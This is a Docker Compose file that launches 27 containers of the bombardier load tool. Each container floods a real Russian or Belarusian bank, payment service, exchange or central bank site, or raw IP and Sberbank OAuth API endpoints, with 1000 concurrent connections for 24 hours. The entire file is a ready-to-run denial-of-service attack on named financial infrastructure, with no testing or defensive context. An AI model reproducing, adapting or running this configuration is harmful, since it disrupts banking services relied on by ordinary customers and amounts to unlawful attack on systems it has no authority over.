version: "3.9"
services:
  banks_1:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.moex.com"
  banks_2:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h http://178.248.236.218"
  banks_3:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h http://178.248.236.218:77"
  banks_4:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h http://194.247.132.130:77"
  banks_5:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h http://194.247.132.130:443"
  banks_6:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://yoomoney.ru"
  banks_7:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://qiwi.com"
  banks_8:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.tinkoff.ru"
  banks_9:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://mironline.ru"
  banks_10:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://belkart.by"
  banks_11:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.rsb.ru"
  banks_12:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.vtb.ru"
  banks_13:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://alfabank.ru"
  banks_14:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.sberbank.ru"
  banks_15:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h sber.ru"
  banks_16:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h 185.157.96.130"
  banks_17:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h profile.sber.ru"
  banks_18:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h 84.252.144.102"
  banks_19:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://api.sberbank.ru/prod/tokens/v2/oauth"
  banks_20:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://api.sberbank.ru/prod/tokens/v2/oidc"
  banks_21:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.rncb.ru"
  banks_22:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.gazprombank.ru"
  banks_23:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.pochtabank.ru"
  banks_24:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://cbr.ru"
  banks_25:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.bspb.ru"
  banks_26:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://www.ubrr.ru"
  banks_27:
    image: alpine/bombardier
    command: "-c 1000 -t 2s -l -d 24h https://raiffeisen.ru"
